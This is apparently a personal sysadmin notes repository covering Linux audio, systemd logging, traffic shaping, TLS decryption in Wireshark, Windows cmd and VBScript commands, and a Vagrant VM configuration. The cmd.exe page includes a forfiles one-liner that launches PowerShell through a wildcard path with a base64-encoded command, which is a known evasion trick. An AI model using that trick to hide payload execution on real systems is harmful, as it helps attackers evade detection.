https://wiki.archlinux.org/index.php/MPD/Tips_and_Tricks#MPD_and_PulseAudio 59 | (This wiki also describe the setup with a local TCP socket) 60 | 61 | 62 | Network 63 | ------- 64 | 65 | Streaming audio stream over the network is quite easy with PulseAudio. Let's 66 | suppose host ``192.0.2.42`` wants to send its audio output to a PulseAudio 67 | server running on host ``192.0.2.1``. 68 | 69 | First setup the listener (``192.0.2.1``) to accept connections from the sender 70 | (``192.0.2.42``). ``/etc/pulse/default.pa``:: 71 | 72 | load-module module-native-protocol-tcp auth-ip-acl=127.0.0.1;192.0.2.42 73 | 74 | Or here is the unsecure configuration:: 75 | 76 | load-module module-native-protocol-tcp listen=0.0.0.0 auth-anonymous=1 77 | 78 | Then configure the sender to send its audio output. ``/etc/pulse/default.pa``:: 79 | 80 | load-module module-rtp-send destination=192.0.2.1 port=16001 81 | 82 | To sync the configuration of PulseAudio with X11, there may be needed to run:: 83 | 84 | pax11publish -e 85 | -------------------------------------------------------------------------------- /sysadmin/systemd.rst: -------------------------------------------------------------------------------- 1 | systemd configuration 2 | ===================== 3 | 4 | Even if systemd works well with the default configuration, it needs to be 5 | configured on some system so that logs don't fill the disk, ... 6 | 7 | Logging: syslog and journald 8 | ---------------------------- 9 | 10 | On most of my systems I'm using syslog-ng to manage my log files. This 11 | interfaces quite well with journald as the only thing you need to do to make it 12 | work is to use these sources in ``/etc/syslog-ng/syslog-ng.conf``:: 13 | 14 | source src { 15 | unix-dgram("/run/systemd/journal/syslog"); 16 | internal(); 17 | file("/proc/kmsg"); 18 | }; 19 | 20 | Once this is done, you no longer need persistent storage to /var/log/journal. 21 | Instead of deleting this directory or making it a tmpfs, the right way to 22 | disable persistent storage is to set this into ``/etc/systemd/journald.conf``:: 23 | 24 | Storage=volatile 25 | ForwardToSyslog=yes 26 | ForwardToKMsg=no 27 | ForwardToConsole=no 28 | 29 | More information can be found in the man page: 30 | http://www.freedesktop.org/software/systemd/man/journald.conf.html 31 | 32 | If you use persistent storage, you may want to rotate logs every 3 months for 33 | example. This option in ``/etc/systemd/journald.conf`` tells journald to do 34 | this:: 35 | 36 | MaxRetentionSec=3month 37 | 38 | Logging: audit logs and journald 39 | -------------------------------- 40 | 41 | journald can listen to the audit socket for events. Even if that could be 42 | useful without ``auditd`` service, it can spam the logs when using software 43 | such as Chrome (https://bugs.chromium.org/p/chromium/issues/detail?id=456535 44 | has been opened for more than a year) and it does not honour auditctl 45 | configuration such as:: 46 | 47 | auditctl -a never,exit -F arch=b64 -S set_robust_list -F path=/usr/lib/chromium/chromium -F key=bug456535 48 | 49 | (This line without ``auditctl`` can be put in 50 | ``/etc/audit/rules.d/chromium.rules`` so that ``augenrules --load`` loads this 51 | at every boot). 52 | 53 | To disable this journald feature, the easier way consists in masking the audit 54 | socket (cf. https://github.com/systemd/systemd/issues/959#issuecomment-174541674): 55 | 56 | .. code-block:: sh 57 | 58 | systemctl mask systemd-journald-audit.socket 59 | 60 | Write journal on tty 61 | -------------------- 62 | 63 | On a workstation, it can be quite convenient to read the journal directly from 64 | ttys above 7 (tty1-6 being consoles and tty7 the X Window session, for example). 65 | 66 | With syslog-ng, the configuration is quite straightforward:: 67 | 68 | source src { system(); }; 69 | destination d_tty9 { file("/dev/tty9" owner(-1) group(-1) perm(-1)); }; 70 | destination d_tty10 { file("/dev/tty10" owner(-1) group(-1) perm(-1)); }; 71 | destination d_tty11 { file("/dev/tty11" owner(-1) group(-1) perm(-1)); }; 72 | destination console_all { file("/dev/tty12" owner(-1) group(-1) perm(-1)); }; 73 | filter f_authpriv { facility(auth, authpriv); }; 74 | filter f_daemon { facility(daemon); }; 75 | filter f_kernel { facility(kern); }; 76 | log { source(src); filter(f_authpriv); destination(d_tty9); }; 77 | log { source(src); filter(f_daemon); destination(d_tty10); }; 78 | log { source(src); filter(f_kernel); destination(d_tty11); }; 79 | log { source(src); destination(console_all); }; 80 | 81 | It is also possible to send emergency messages to everyone logged in:: 82 | 83 | source s_src { 84 | system(); 85 | internal(); 86 | }; 87 | destination du_all { usertty("*"); }; 88 | filter f_emerg { level(emerg); }; 89 | log { source(s_src); filter(f_emerg); destination(du_all); }; 90 | 91 | With journald, the only "natively" available feature is logging to a tty, with 92 | something like this in ``/etc/systemd/journald.conf``:: 93 | 94 | ForwardToConsole=yes 95 | TTYPath=/dev/tty12 96 | MaxLevelConsole=info 97 | 98 | The other filters can be implemented with services. Here are some files. 99 | 100 | ``/etc/systemd/system/journal@.service``:: 101 | 102 | [Unit] 103 | Description=Show journal on %I 104 | After=systemd-journald.service 105 | ConditionPathExists=/dev/%I 106 | 107 | [Service] 108 | Type=idle 109 | StandardOutput=tty 110 | TTYPath=/dev/%I 111 | TTYReset=yes 112 | TTYVHangup=yes 113 | 114 | [Install] 115 | WantedBy=multi-user.target 116 | 117 | ``/etc/systemd/system/journal@tty9.service``:: 118 | 119 | .include /etc/systemd/system/journal@.service 120 | 121 | [Unit] 122 | Description=Show journal on %I (auth) 123 | 124 | [Service] 125 | # Facilities: 4 = LOG_AUTH, 10 = LOG_AUTHPRIV 126 | ExecStart=/usr/bin/journalctl -b -n50 SYSLOG_FACILITY=4 SYSLOG_FACILITY=10 127 | 128 | ``/etc/systemd/system/journal@tty10.service``:: 129 | 130 | .include /etc/systemd/system/journal@.service 131 | 132 | [Unit] 133 | Description=Show journal on %I (daemon) 134 | 135 | [Service] 136 | # Facility codes: 137 | # 2 = LOG_MAIL 138 | # 3 = LOG_DAEMON 139 | # 5 = LOG_SYSLOG 140 | # 6 = LOG_LPR 141 | # 7 = LOG_NEWS 142 | # 8 = LOG_UUCP 143 | # 9 = LOG_CRON 144 | # 11 = LOG_FTP 145 | # 146 | # Not selected: 147 | # 0 = LOG_KERN 148 | # 1 = LOG_USER 149 | # 4 = LOG_AUTH 150 | # 10 = LOG_AUTHPRIV 151 | # 16..23 = LOG_LOCAL0..7 152 | # 153 | # Source: /usr/include/sys/syslog.h 154 | # in glibc: https://sourceware.org/git/?p=glibc.git;a=blob;f=misc/sys/syslog.h;hb=HEAD 155 | ExecStart=/usr/bin/journalctl -b -n50 \ 156 | SYSLOG_FACILITY=2 SYSLOG_FACILITY=3 SYSLOG_FACILITY=5 SYSLOG_FACILITY=6 \ 157 | SYSLOG_FACILITY=7 SYSLOG_FACILITY=8 SYSLOG_FACILITY=9 SYSLOG_FACILITY=11 158 | 159 | ``/etc/systemd/system/journal@tty11.service``:: 160 | 161 | .include /etc/systemd/system/journal@.service 162 | 163 | [Unit] 164 | Description=Show journal on %I (kernel) 165 | 166 | [Service] 167 | # --dmesg implies -b and _TRANSPORT=kernel 168 | ExecStart=/usr/bin/journalctl -b -f -n 50 --dmesg 169 | 170 | ``/etc/systemd/system/journal@tty12.service``:: 171 | 172 | .include /etc/systemd/system/journal@.service 173 | 174 | [Unit] 175 | Description=Show journal on %I (everything) 176 | 177 | [Service] 178 | ExecStart=/usr/bin/journalctl -b -f -n 50 179 | 180 | With such commands, it is also possible to pipe ``journalctl`` output to 181 | ``ccze`` (if installed) to colorize the logs. 182 | 183 | 184 | Configure timers (and remove cron) 185 | ---------------------------------- 186 | 187 | systemd doesn't rely on a cron daemon to run periodic tasks but uses its own 188 | system with calendar time events. ArchLinux provides on its wiki some config 189 | files to replace common cron scripts: 190 | https://wiki.archlinux.org/index.php/Systemd/cron_functionality 191 | 192 | Since April 2014 the timers are included and enabled by default, with timer 193 | files in ``/usr/lib/systemd/system`` and symlinks in 194 | ``/usr/lib/systemd/system/multi-user.target.wants/``. To disable some timers 195 | which do many disk writes, an overriding unit needs to be created. 196 | 197 | ``/etc/systemd/system/disabled-timer.service``:: 198 | 199 | [Unit] 200 | Description=Unit to be able to disable timers 201 | 202 | [Service] 203 | Type=oneshot 204 | ExecStart=/usr/bin/true 205 | 206 | 207 | ``/etc/systemd/system/updatedb.timer``:: 208 | 209 | [Unit] 210 | Description=Disabled locate database update 211 | 212 | [Timer] 213 | #OnCalendar=daily 214 | #Persistent=true 215 | #OnBootSec=10min 216 | #OnUnitActiveSec=1d 217 | OnCalendar=monthly 218 | Unit=disabled-timer.service 219 | 220 | Another way may consist in masking the service units, but it did not work well 221 | back in spring 2014:: 222 | 223 | $ systemctl mask updatedb 224 | Created symlink from /etc/systemd/system/updatedb.service to /dev/null. 225 | 226 | Automatically create a bridge interface 227 | --------------------------------------- 228 | 229 | To automatically create a bridge interface which can be used for example to 230 | bridge together several virtual machines, here is a systemd-networkd 231 | configuration. 232 | 233 | ``/etc/systemd/network/VMBridge.netdev``:: 234 | 235 | [NetDev] 236 | Name=br0 237 | Kind=bridge 238 | 239 | ``/etc/systemd/network/br0.network``:: 240 | 241 | [Match] 242 | Name=br0 243 | 244 | [Network] 245 | IPForward=yes 246 | 247 | [Address] 248 | Address=198.51.100.0/24 249 | -------------------------------------------------------------------------------- /sysadmin/tmpfs.rst: -------------------------------------------------------------------------------- 1 | Use tmpfs for some directories 2 | ============================== 3 | 4 | On my hosts I configure some directories to be tmpfs mountpoint to save disk 5 | writes, which is very important when using SSD drives. Here is how to do so. 6 | 7 | ``/tmp`` 8 | -------- 9 | 10 | Here is what I usually put in my ``/etc/fstab``:: 11 | 12 | # 13 | tmpfs /tmp tmpfs nodev,nosuid,noexec 0 0 14 | 15 | ``$HOME/.cache`` 16 | ---------------- 17 | 18 | Example of ``/etc/fstab`` entry for user's ``.cache`` home subdirectory:: 19 | 20 | $USER.cache $HOME/.cache tmpfs defaults,auto,nodev,noexec,nosuid,size=2048M,gid=100,uid=1000,mode=0700 0 0 21 | 22 | As ``.cache/pacaur`` is intended to persist across reboots, this directory can 23 | be set up as a bind-mount:: 24 | 25 | $HOME/.cache.pacaur $HOME/.cache/pacaur none bind 0 0 26 | 27 | Yaourt build dir on ArchLinux 28 | ----------------------------- 29 | 30 | To build AUR packaes, yaourt uses ``/tmp/yaourt-tmp-$USER``. To make this 31 | directory a tmpfs mountpoint the time of a build, add the following line to 32 | ``/etc/fstab``:: 33 | 34 | $USER.yaourt /tmp/yaourt-tmp-$USER tmpfs defaults,user,noauto,nodev,exec,nosuid,gid=$GID,uid=$UID,mode=0700 0 0 35 | 36 | Then, create (if needed) and mount ``/tmp/yaourt-tmp-$USER`` before running 37 | yaourt. 38 | 39 | Other directories 40 | ----------------- 41 | 42 | Here are some entries which may be written into ``/etc/fstab``:: 43 | 44 | # Web browser downloads 45 | $HOME/Downloads/tmp tmpfs defaults,auto,nodev,nosuid,exec,gid=$GID,uid=$UID,mode=0700,rootcontext=$(getfattr --only-values -n security.selinux $HOME/Downloads) 0 0 46 | 47 | # makepkg build directory (modify BUILDDIR=/tmp/makepkg-$USER in /etc/makepkg.conf) 48 | $USER.yaourt /tmp/makepkg-$USER tmpfs defaults,user,noauto,nodev,exec,nosuid,gid=$GID,uid=$UID,mode=0700 0 0 49 | -------------------------------------------------------------------------------- /sysadmin/traffic-shaping.rst: -------------------------------------------------------------------------------- 1 | Traffic shaping 2 | =============== 3 | 4 | This is not a complete guide which explains how to shape traffic but a list 5 | of not-so-intuitive commands related to traffic shaping. 6 | 7 | Documentation: 8 | 9 | * http://linux-ip.net/articles/Traffic-Control-HOWTO/ 10 | * http://lartc.org/wondershaper/ (scripts to do QoS on ADSL) 11 | * https://www.kernel.org/doc/Documentation/cgroups/net_cls.txt (filter with cgroup) 12 | * http://lartc.org/manpages/tc.html (official manpage) 13 | * http://lartc.org/howto/lartc.qdisc.filters.html (tc filters) 14 | 15 | First, to dump current traffic shaping rules on interface ``eth0``, use the 16 | following command (``tc`` means "Traffic Controller"):: 17 | 18 | tc -s qdisc show dev eth0 19 | 20 | By default it will display something like:: 21 | 22 | qdisc pfifo_fast 0: root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 23 | Sent 42000 bytes 1337 pkt (dropped 0, overlimits 0 requeues 0) 24 | backlog 0b 0p requeues 0 25 | 26 | At any time, to restore this default configuration (and remove all rules), run:: 27 | 28 | tc qdisc del dev eth0 root 29 | 30 | 31 | Egress shaping (limiting outbound traffic) 32 | ------------------------------------------ 33 | 34 | This command attaches a TBF (Token Bucket Filter) to ``eth0`` which : 35 | 36 | * limit the maximum rate to 1 Mbits/s, 37 | * define a peakrate at 2 Mbits/s, 38 | * use a 10 KB buffer, 39 | * limit the latency caused by the TBF to at most 70ms 40 | 41 | :: 42 | 43 | tc qdisc add dev eth0 root tbf rate 1mbit peakrate 2mbit burst 10kb latency 70ms minburst 1540 44 | 45 | 46 | Delay 47 | ----- 48 | 49 | This command applies a delay of 500ms on each outbound packets:: 50 | 51 | tc qdisc add dev eth0 root netem delay 500ms 52 | 53 | With this, ``tc qdisc show dev eth0`` shows:: 54 | 55 | qdisc netem 8001: root refcnt 2 limit 1000 delay 500.0ms 56 | 57 | 58 | HTTP server outbound traffic shaping 59 | ------------------------------------ 60 | 61 | When running an HTTP server on TCP port 80, it is possible to throttle the 62 | outbound traffic with ``tc-htb`` (Hierarchy Token Bucket):: 63 | 64 | tc qdisc add dev eth0 root handle 1:0 htb default 1 65 | tc class add dev eth0 parent 1:0 classid 1:10 htb rate 512kbps ceil 768kbps prio 0 66 | tc filter add dev eth0 parent 1:0 protocol ip match ip sport 80 0xffff flowid 1:10 67 | 68 | Here are some commands to get a similar behavior of the last ``tc filter`` 69 | command with ``iptables`` power:: 70 | 71 | iptables -A OUTPUT -t mangle -o eth0 -p tcp --sport 80 -j MARK --set-mark 10 72 | ip6tables -A OUTPUT -t mangle -o eth0 -p tcp --sport 80 -j MARK --set-mark 10 73 | tc filter add dev eth0 parent 1:0 prio 0 protocol ip handle 10 fw flowid 1:10 74 | 75 | 76 | To show active rules:: 77 | 78 | # tc -s -d class show dev eth0 79 | class htb 1:10 root prio 0 quantum 51200 rate 4096Kbit ceil 6144Kbit burst 1599b/1 mpu 0b overhead 0b cburst 1598b/1 mpu 0b overhead 0b level 0 80 | Sent 42000 bytes 1337 pkt (dropped 0, overlimits 0 requeues 0) 81 | rate 400bit 0pps backlog 0b 0p requeues 0 82 | lended: 1337 borrowed: 0 giants: 0 83 | tokens: 44738 ctokens: 29819 84 | 85 | # tc filter show dev eth0 86 | filter parent 1: protocol ip pref 49152 fw 87 | 88 | It is also possible to filter by IP address:: 89 | 90 | tc filter add dev eth0 parent 1:0 protocol ip prio 1 u32 match ip dst 192.0.2.42/32 flowid 1:1 91 | tc filter add dev eth0 parent 1:0 protocol ipv6 prio 2 u32 match ip6 dst 2001:db8::beef/128 flowid 1:1 92 | tc filter add dev eth0 parent 1:0 protocol ip prio 3 u32 match ip src 192.0.2.36/32 flowid 1:2 93 | tc filter add dev eth0 parent 1:0 protocol ipv6 prio 4 u32 match ip6 src 2001:db8::cafe/128 flowid 1:2 94 | 95 | If you happen to define filters for IPv4 and IPv6 with the same priority, the 96 | kernel rejects the request with a mysterious message:: 97 | 98 | RTNETLINK answers: Invalid argument 99 | We have an error talking to the kernel 100 | 101 | When such a thing happens, you only need to use a different "prio" argument for 102 | your IPv4 and IPv6 filters. 103 | 104 | 105 | Make downloads slow 106 | ------------------- 107 | 108 | In order to slow down downloads to prevent them from filling ISP's buffers, you 109 | can attach a filter in ingress mode which drops too fast packets:: 110 | 111 | tc qdisc add dev eth0 handle ffff: ingress 112 | tc filter add dev eth0 parent ffff: protocol ip prio 50 u32 \ 113 | match ip src 0.0.0.0/0 police rate 800kbit burst 10k drop flowid :1 114 | 115 | After that, statistics commands display this:: 116 | 117 | # tc qdisc show dev eth0 118 | qdisc pfifo_fast 0: dev eth0 root refcnt 2 bands 3 priomap 1 2 2 2 1 2 0 0 1 1 1 1 1 1 1 1 119 | qdisc ingress ffff: dev eth0 parent ffff:fff1 ---------------- 120 | 121 | # tc filter show dev eth0 parent ffff: 122 | filter protocol ip pref 50 u32 123 | filter protocol ip pref 50 u32 fh 800: ht divisor 1 124 | filter protocol ip pref 50 u32 fh 800::800 order 2048 key ht 800 bkt 0 flowid :1 125 | match 00000000/00000000 at 12 126 | action order 0: police 0x1 rate 800Kbit burst 10Kb mtu 2Kb action drop overhead 0b 127 | ref 1 bind 1 128 | 129 | To delete everything related to inbound packets policy on ``eth0``, use:: 130 | 131 | tc qdisc del dev eth0 ingress 132 | -------------------------------------------------------------------------------- /sysadmin/user.rst: -------------------------------------------------------------------------------- 1 | User management on Linux 2 | ======================== 3 | 4 | Add a new user 5 | -------------- 6 | 7 | Command: 8 | 9 | .. code-block:: sh 10 | 11 | useradd LOGIN 12 | 13 | Options:: 14 | 15 | -c, --comment "Comment" 16 | -m, --create-home 17 | -u, --uid UID 18 | 19 | Add an existing user to groups 20 | ------------------------------ 21 | 22 | Example: 23 | 24 | .. code-block:: sh 25 | 26 | usermod -a -G sudo,adm user 27 | -------------------------------------------------------------------------------- /sysadmin/wireshark-https.rst: -------------------------------------------------------------------------------- 1 | Wireshark: analyzing HTTPS traffic 2 | ================================== 3 | 4 | HTTPS packets can be decrypted using the server private key when non-Perfect Forward Secrecy cipher suites are used. 5 | In most cases nowadays, this will not work. 6 | Instead, the master secret needs to be recorded, for example using ``SSLKEYLOGFILE``: 7 | 8 | - In Curl: https://everything.curl.dev/usingcurl/tls/sslkeylogfile 9 | - In Firefox: https://firefox-source-docs.mozilla.org/security/nss/legacy/key_log_format/index.html 10 | - In Chrome: option ``--ssl-key-log-file`` 11 | - In Python: https://sslkeylog.readthedocs.io/en/latest/ 12 | - Wireshark documentation: https://wiki.wireshark.org/TLS#using-the-pre-master-secret 13 | 14 | For example: 15 | 16 | .. code-block:: sh 17 | 18 | # Capture network traffic 19 | tshark -ni any -w capture.pcapng 20 | 21 | # Perform a request to a HTTPS website, for example with curl 22 | SSLKEYLOGFILE=keylogfile.txt curl https://wiki.wireshark.org/ 23 | 24 | # Merge the secrets in the Decryption Secrets Block part of the capture file 25 | editcap --inject-secrets tls,keylogfile.txt capture.pcapng capture-with-secrets.pcapng 26 | 27 | # It is also possible to live-capture with the keylogfile 28 | # Option -V -O http displays packet details for (decrypted) HTTP 29 | # Option -x displays hexadecimal data 30 | tshark -ni any -f 'tcp port 443' -o tls.keylog_file:keylogfile.txt -V -O http -x 31 | 32 | The keylogfile then looks like (for TLS 1.3): 33 | 34 | .. code-block:: text 35 | 36 | SERVER_HANDSHAKE_TRAFFIC_SECRET f3cac18f4b5042390a8929a1bef9e5d543a214d3a163a8649843457e91a95265 37 | 5d06ef1d3074b3ce830fddece3000e81028467c30bcd35eeee0ef867f8d22c4a1ab08db4172ac1235faab04b10e6c1e5 38 | EXPORTER_SECRET f3cac18f4b5042390a8929a1bef9e5d543a214d3a163a8649843457e91a95265 39 | dc27c85675113c4c1b2b0187cb1e2d6615b9039f66fa69e16822ccea989fb45049303113e184f266e672b1e867c03201 40 | SERVER_TRAFFIC_SECRET_0 f3cac18f4b5042390a8929a1bef9e5d543a214d3a163a8649843457e91a95265 41 | 2930b243f1dab9c62dd96439355ebd22a689d3eca9e8acce9fcaad00b3ca7206ccba5258501696f774527398e8dabc49 42 | CLIENT_HANDSHAKE_TRAFFIC_SECRET f3cac18f4b5042390a8929a1bef9e5d543a214d3a163a8649843457e91a95265 43 | 7ed9a53c1b24b70bcd0474ccd85323f14eeb27871d7e68c51c33ab884e3c7bd29bdb749290d564da2dc0aad212c88a65 44 | CLIENT_TRAFFIC_SECRET_0 f3cac18f4b5042390a8929a1bef9e5d543a214d3a163a8649843457e91a95265 45 | 42e9ee4316095ea838daefef1cfdc2587d0fe4369d77dfed0182c2c476cfe54bd86541b3b4b488e908a7f8cf1fe2c436 46 | 47 | For TLS 1.2 (for example using ``curl --tlsv1.2 --tls-max 1.2``): 48 | 49 | .. code-block:: text 50 | 51 | CLIENT_RANDOM 0e42bf17cf0d1b3140b29b44cddedf29db7abcb5ab01f91259987678e5ce9d57 52 | a9e4f9da3afa588934f984c457bb6fe99a9f77e3e9dd6796c7596d683790f46ba532a1a2e308c52a81ebc03e652f1bae 53 | -------------------------------------------------------------------------------- /windows/Vagrantfile: -------------------------------------------------------------------------------- 1 | # -*- mode: ruby -*- 2 | # vi: set ft=ruby : 3 | 4 | Vagrant.configure("2") do |config| 5 | # cf. vagrant.rst for instructions on downloading and importing windows/win10-edge box 6 | config.vm.box = "windows/win10-edge" 7 | 8 | # Configure remote access 9 | config.ssh.username = "IEUser" 10 | config.ssh.password = "Passw0rd!" 11 | 12 | # Use Windows Remote Management protocol (WinRM) 13 | #config.vm.communicator = "winrm" 14 | config.winrm.username = "IEUser" 15 | config.winrm.password = "Passw0rd!" 16 | 17 | # Use 2 CPU and 4GB of RAM 18 | config.vm.provider :libvirt do |v| 19 | v.cpus = 2 20 | v.memory = 4096 21 | 22 | # Use a virtual TPM 2.0 with swtpm 23 | v.tpm_model = 'tpm-crb' 24 | v.tpm_type = 'emulator' 25 | end 26 | end 27 | -------------------------------------------------------------------------------- /windows/cmd.rst: -------------------------------------------------------------------------------- 1 | Some cmd.exe commands 2 | ===================== 3 | 4 | Here is a set of commands which are not very easy to remember but can be useful. 5 | 6 | Create a file with input from the console:: 7 | 8 | copy con new_file.txt 9 | 10 | # Read it 11 | type new_file.txt 12 | # Remove it 13 | del new_file.txt 14 | 15 | Resize the window (from http://superuser.com/questions/653390/how-can-i-open-a-console-application-with-a-given-window-size):: 16 | 17 | mode con:cols=140 lines=70 18 | 19 | Change colors:: 20 | 21 | # Write white on blue background 22 | color 1f 23 | 24 | # Write dark or light green on black 25 | color 2 26 | color a 27 | 28 | Run PowerShell using ``forfiles`` (cf. https://twitter.com/AmnaKMahmood/status/1121504040083496961):: 29 | 30 | # /p to specify the path where to start searching, 31 | # /s to recurse into subdirectories, 32 | # /m to specify the search mask, 33 | # /c to run a command, with @file being the name of the file and @path the full path 34 | forfiles /s /p C:\WINDOWS\System32 /m p*ll.*e /c "cmd /c @file -ec aQBlAHgAIAAoAGcAcAAgACcA..." 35 | -------------------------------------------------------------------------------- /windows/index.rst: -------------------------------------------------------------------------------- 1 | Windows system information 2 | ========================== 3 | 4 | This section contains information specific to Windows operating system. 5 | 6 | .. toctree:: 7 | :maxdepth: 2 8 | :glob: 9 | 10 | * 11 | -------------------------------------------------------------------------------- /windows/key_shortcuts.rst: -------------------------------------------------------------------------------- 1 | Keyboard shortcuts on Windows 2 | ============================= 3 | 4 | General keyboard shortcuts 5 | -------------------------- 6 | 7 | * ``F2``: 8 | Rename the selected item. 9 | 10 | * ``F3``: 11 | Search for a file or folder in File Explorer. 12 | 13 | * ``F4``: 14 | Display the address bar list in File Explorer. 15 | 16 | * ``F5`` or ``Ctrl + R``: 17 | Refresh the active window. 18 | 19 | * ``F6``: 20 | Cycle through screen elements in a window or on the desktop. 21 | 22 | * ``F10``: 23 | Activate the Menu bar in the active app. 24 | 25 | * ``Alt + Space``: 26 | Open the shortcut menu for the active window. 27 | 28 | * ``Alt + F4``: 29 | Close the active item, or exit the active app. 30 | 31 | * ``Alt + F8``: 32 | Show your password on the sign-in screen. 33 | 34 | * ``Alt + Tab``: 35 | Switch between windows. 36 | 37 | * ``Ctrl + Alt + Tab``: 38 | Use the arrow keys to switch between all open apps. 39 | 40 | * ``Ctrl + Escape`` or ``Win``: 41 | Show the start menu. 42 | 43 | * ``Ctrl + Shift``: 44 | Open Task Manager. 45 | 46 | * ``Ctrl + Shift + Esc``: 47 | Switch the keyboard layout when multiple keyboard layouts are available. 48 | 49 | * ``Ctrl + Space``: 50 | Turn the Chinese input method editor (IME) on or off. 51 | 52 | * ``Ctrl + A``: 53 | Select all items in a document or window. 54 | 55 | * ``Ctrl + C`` or ``Ctrl + Insert``: 56 | Copy the selected item. 57 | 58 | * ``Ctrl + X``: 59 | Cut the selected item. 60 | 61 | * ``Ctrl + V`` or ``Shift + Insert``: 62 | Paste the selected item. 63 | 64 | * ``Ctrl + Y``: 65 | Redo an action. 66 | 67 | * ``Ctrl + Z``: 68 | Undo an action. 69 | 70 | * ``Shift + F10``: 71 | Bring up the context menu for the selected item 72 | 73 | 74 | Shortcuts using Windows logo key 75 | -------------------------------- 76 | 77 | * ``Win + Tab``: 78 | Open Task View Bring up the overview mode of all windows. 79 | 80 | * ``Win + Space``: 81 | Switch input language and keyboard layout. 82 | 83 | * ``Win + Ctrl + Space``: 84 | Change to a previously selected input. 85 | 86 | * ``Win + Ctrl + Enter``: 87 | Turn on Narrator. 88 | 89 | * ``Win + A``: 90 | Open Action center. 91 | 92 | * ``Win + B``: 93 | Set focus in the notification area. 94 | 95 | * ``Win + D``: 96 | Show/hide the desktop. 97 | 98 | * ``Win + Shift + D``: 99 | Show/hide the date and time on the desktop. 100 | 101 | * ``Win + E``: 102 | Open file explorer. 103 | 104 | * ``Win + I``: 105 | Open settings. 106 | 107 | * ``Win + L``: 108 | Lock the PC or switch accounts. 109 | 110 | * ``Win + M``: 111 | Minimize all windows. 112 | 113 | * ``Win + Shift + M``: 114 | Restore minimized windows on the desktop. 115 | 116 | * ``Win + O``: 117 | Lock device orientation. 118 | 119 | * ``Win + P``: 120 | Choose a presentation display mode. 121 | 122 | * ``Win + R``: 123 | Bring up the "Run" dialog box. Will allow you to type in the internal executable name to run it. 124 | 125 | * ``Win + S``: 126 | Open search. 127 | 128 | * ``Win + Shift + S``: 129 | Perform a partial screenshot. Allow you to select what you want screenshotted. 130 | 131 | * ``Win + T``: 132 | Cycle through apps on the taskbar. 133 | 134 | * ``Win + V``: 135 | Open the Windows clipboard manager (this shortcut is enabled in Start > Settings > System > Clipboard > Clipboard history). 136 | 137 | * ``Win + X``: 138 | Open the Quick Link menu. Bring up a list of actions, including "Start PowerShell as Admin". 139 | 140 | * ``Win + Z``: 141 | Show the commands available in an app in full-screen mode. 142 | 143 | * ``Win + .`` or ``Win + ;``: 144 | Bring up the emoji picker. After pressing, start typing to search. 145 | 146 | * ``Win + ,``: 147 | Temporarily peek at the desktop. 148 | 149 | * ``Win + Plus``: 150 | Open Magnifier. 151 | 152 | * ``Win + /``: 153 | Begin Chinese input method editor (IME) reconversion. 154 | 155 | 156 | Virtual desktops commands 157 | ------------------------- 158 | 159 | * ``Win + Ctrl + D``: 160 | Add a new virtual desktop 161 | 162 | * ``Win + Ctrl + Left Arrow``, ``Win + Ctrl + Right Arrow``: 163 | Move between virtual desktops 164 | 165 | * ``Win + Ctrl + F4``: 166 | Close current virtual desktop 167 | 168 | 169 | Documentation 170 | ------------- 171 | 172 | * https://support.microsoft.com/en-us/help/12445/windows-keyboard-shortcuts 173 | * https://unicorn-utterances.com/posts/ultimate-windows-development-environment-guide/#built-in-keyboard-shortcuts 174 | -------------------------------------------------------------------------------- /windows/utc-clock.rst: -------------------------------------------------------------------------------- 1 | Set hardware clock to UTC 2 | ------------------------- 3 | 4 | Some OS like GNU/Linux and MacOS set up the hardware clock to use UTC instead 5 | of local time. This helps when dealing with daylight saving time, as the real 6 | clock does not need to be updated accordingly. 7 | 8 | Windows expects the hardware clock to give "local time" by default. The reason 9 | is, according to Microsoft, so that users are not confused in BIOS menu 10 | (http://blogs.msdn.com/b/oldnewthing/archive/2004/09/02/224672.aspx). 11 | 12 | To enable UTC real-time clock in Windows, put this in a ``.reg`` file:: 13 | 14 | Windows Registry Editor Version 5.00 15 | 16 | [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation] 17 | "RealTimeIsUniversal"=dword:00000001 18 | 19 | Apply this file for example with a command like:: 20 | 21 | reg import utc-clock.reg 22 | 23 | Or directly set the value with:: 24 | 25 | reg add HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation /v RealTimeIsUniversal /t REG_DWORD /d 1 26 | 27 | To check the current config, you can use:: 28 | 29 | > reg query HKLM\SYSTEM\CurrentControlSet\Control\TimeZoneInformation /v RealTimeIsUniversal 30 | 31 | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\TimeZoneInformation 32 | RealTimeIsUniversal REG_DWORD 0x1 33 | -------------------------------------------------------------------------------- /windows/vbscript.rst: -------------------------------------------------------------------------------- 1 | Some VBScript commands 2 | ====================== 3 | 4 | VBScript is a light version of Microsoft's programming language Visual Basic. 5 | It can be used in ASP (Active Server Pages) between tags ``<%`` and ``%>``, or run as a standalone script using a file ending with ``.vbs`` and interpreter ``wscript.exe``. 6 | 7 | Special variables 8 | ----------------- 9 | 10 | When launching a script: 11 | 12 | * ``WScript.ScriptFullName`` contains the path of the script 13 | * ``WScript.Arguments(0)`` contains the first argument of the invocation 14 | 15 | Launch a process 16 | ---------------- 17 | 18 | .. code-block:: sh 19 | 20 | Dim objShell, strCommand 21 | Set objShell = CreateObject("Wscript.Shell") 22 | 23 | ' Show string concatenation and use Chr(), even though this is a trivial example 24 | strCommand = "cmd /c" & Chr(32) & "echo Hello" 25 | 26 | ' Syntax: objShell.Run (strCommand, [intWindowStyle], [bWaitOnReturn]) 27 | objShell.Run strCommand, 0, true 28 | 29 | Set objShell = Nothing 30 | -------------------------------------------------------------------------------- /www/htdocs/403.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 403 Forbidden 5 | 6 | 7 |

Forbidden

8 |

9 | You don't have permission to access the requested object. 10 | It is either read-protected or not readable by the server. 11 |

12 | 13 | 14 | -------------------------------------------------------------------------------- /www/htdocs/404.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 404 Not Found 5 | 6 | 7 |

Not Found

8 |

9 | The requested URL was not found on this server. 10 | If you entered the URL manually please check your spelling and try again. 11 |

12 | 13 | 14 | -------------------------------------------------------------------------------- /www/htdocs/500.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 500 Internal Server Error 5 | 6 | 7 |

500 Internal Server Error

8 |

9 | The server encountered an internal error and was unable to complete your request. 10 |

